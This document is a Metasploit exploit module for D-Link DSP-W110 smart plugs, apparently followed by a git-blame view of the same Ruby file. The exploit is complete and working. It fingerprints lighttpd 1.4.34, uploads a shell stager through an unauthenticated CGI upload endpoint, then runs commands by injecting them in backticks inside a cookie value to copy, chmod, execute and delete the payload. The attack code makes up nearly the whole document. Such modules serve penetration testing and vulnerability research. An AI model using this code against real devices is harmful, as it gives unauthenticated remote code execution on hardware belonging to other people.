modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link Cookie Command Execution',
      'Description'    => %q{
        This module exploits an anonymous remote upload and code execution vulnerability on different
        D-Link devices. The vulnerability is a command injection in the cookie handling process of the
        lighttpd web server when handling specially crafted cookie values. This module has been
        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
      },
      'Author'         =>
        [
          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'References'     =>
        [
          ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
        ],
      'DisclosureDate' => '2015-06-12',
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets' =>
        [
          [ 'MIPS Little Endian',  # unknown if there are LE devices out there ... but in case we have a target
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSBE
            }
          ]
        ],
      'DefaultTarget'    => 1
      ))
  end

  def check
    begin
      res = send_request_cgi({
        'uri'    => '/',
        'method' => 'GET'
      })

      if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("Trying to access the device ...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("Uploading stager ...")
    @counter = 1
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 95  # limited by our upload, larger payloads crash the web server
    )

    print_status("creating payload and executing it ...")

    (1 .. @counter).each do |act_file|
      # the http server blocks access to our files ... we copy it to a new one
      # the length of our command is restricted to 19 characters
      cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "chmod +x /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "/tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
    end
  end

  def execute_command(cmd,opts)
    # upload our stager to a shell script
    # upload takes quite long because there is no response from the web server

    file_upload = "#!/bin/sh\n"
    file_upload << cmd << "\n"

    post_data = Rex::MIME::Message.new
    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
    post_data.bound = "-#{rand_text_alpha(12)}--"
    file = post_data.to_s

    @counter = @counter + 1

    begin
      send_request_cgi({
        'method'        => 'POST',
        'uri'           => "/web_cgi.cgi",
        'vars_get' => {
          '&request' =>'UploadFile',
          'path' => '/tmp/'
        },
        'encode_params' => false,
        'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
        'data'          => file
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end

  end

  def execute_final_command(cmd)
    # very limited space - larger commands crash the webserver
    fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
    begin
      send_request_cgi({
        'method'        => 'GET',
        'uri'           => "/",
        'cookie'        => "i=`#{cmd}`"
      }, 5)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::HttpClient`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`include Msf::Exploit::CmdStager`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'D-Link Cookie Command Execution',`
			`'Description' => %q{`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`This module exploits an anonymous remote upload and code execution vulnerability on different`
			`D-Link devices. The vulnerability is a command injection in the cookie handling process of the`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`lighttpd web server when handling specially crafted cookie values. This module has been`
server header 2015-06-24 21:32:01 +02:00			`successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`},`
			`'Author' =>`
			`[`
port, email, cleanup 2015-06-14 08:27:23 +02:00			`'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC`
final cleanup 2015-07-15 11:21:39 +02:00			`'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`],`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'linux',`
			`'References' =>`
			`[`
			`['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2015-06-12',`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`'Payload' =>`
cmd_interact - first try 2015-06-20 07:59:25 +02:00			`{`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`'DisableNops' => true`
cmd_interact - first try 2015-06-20 07:59:25 +02:00			`},`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`'Targets' =>`
			`[`
server header 2015-06-24 21:32:01 +02:00			`[ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`{`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_MIPSLE`
			`}`
			`],`
server header 2015-06-24 21:32:01 +02:00			`[ 'MIPS Big Endian',`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`{`
			`'Platform' => 'linux',`
			`'Arch' => ARCH_MIPSBE`
			`}`
final cleanup 2015-07-15 11:21:39 +02:00			`]`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`],`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`'DefaultTarget' => 1`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`))`
			`end`

			`def check`
			`begin`
			`res = send_request_cgi({`
			`'uri' => '/',`
final cleanup 2015-07-15 11:21:39 +02:00			`'method' => 'GET'`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`})`

server header 2015-06-24 21:32:01 +02:00			`if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`return Exploit::CheckCode::Detected`
			`end`
			`rescue ::Rex::ConnectionError`
			`return Exploit::CheckCode::Unknown`
			`end`

			`Exploit::CheckCode::Unknown`
			`end`

			`def exploit`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Trying to access the device ...")`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00
			`unless check == Exploit::CheckCode::Detected`
			`fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")`
			`end`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Uploading stager ...")`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`@counter = 1`
			`execute_cmdstager(`
			`:flavor => :echo,`
final cleanup 2015-07-15 11:21:39 +02:00			`:linemax => 95 # limited by our upload, larger payloads crash the web server`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`)`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("creating payload and executing it ...")`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00
			`(1 .. @counter).each do \|act_file\|`
final cleanup 2015-07-15 11:21:39 +02:00			`# the http server blocks access to our files ... we copy it to a new one`
			`# the length of our command is restricted to 19 characters`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"`
			`execute_final_command(cmd)`
			`cmd = "chmod +x /tmp/#{act_file+@counter}"`
			`execute_final_command(cmd)`
			`cmd = "/tmp/#{act_file+@counter}"`
			`execute_final_command(cmd)`
			`cmd = "rm /tmp/#{act_file}"`
			`execute_final_command(cmd)`
			`cmd = "rm /tmp/#{act_file+@counter}"`
			`execute_final_command(cmd)`
			`end`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`end`

echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`def execute_command(cmd,opts)`
final cleanup 2015-07-15 11:21:39 +02:00			`# upload our stager to a shell script`
			`# upload takes quite long because there is no response from the web server`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00
mime message 2015-07-06 15:00:12 +02:00			`file_upload = "#!/bin/sh\n"`
			`file_upload << cmd << "\n"`

			`post_data = Rex::MIME::Message.new`
feedback included 2015-07-09 08:31:11 +02:00			`post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")`
			`post_data.bound = "-#{rand_text_alpha(12)}--"`
mime message 2015-07-06 15:00:12 +02:00			`file = post_data.to_s`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`@counter = @counter + 1`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`begin`
			`send_request_cgi({`
			`'method' => 'POST',`
feedback included 2015-07-09 08:31:11 +02:00			`'uri' => "/web_cgi.cgi",`
			`'vars_get' => {`
			`'&request' =>'UploadFile',`
final cleanup 2015-07-15 11:21:39 +02:00			`'path' => '/tmp/'`
feedback included 2015-07-09 08:31:11 +02:00			`},`
			`'encode_params' => false,`
mime message 2015-07-06 15:00:12 +02:00			`'ctype' => "multipart/form-data; boundary=#{post_data.bound}",`
			`'data' => file`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`})`
			`rescue ::Rex::ConnectionError`
			`fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`end`
cmd_interact - first try 2015-06-20 07:59:25 +02:00
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`end`

echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`def execute_final_command(cmd)`
final cleanup 2015-07-15 11:21:39 +02:00			`# very limited space - larger commands crash the webserver`
mime message 2015-07-06 15:00:12 +02:00			`fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`begin`
echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00			`send_request_cgi({`
dsp-w110-command-injection 2015-06-13 21:45:56 +02:00			`'method' => 'GET',`
			`'uri' => "/",`
			'cookie' => "i=`#{cmd}`"
			`}, 5)`
			`rescue ::Rex::ConnectionError`
			`fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")`
			`end`
			`end`
			`end`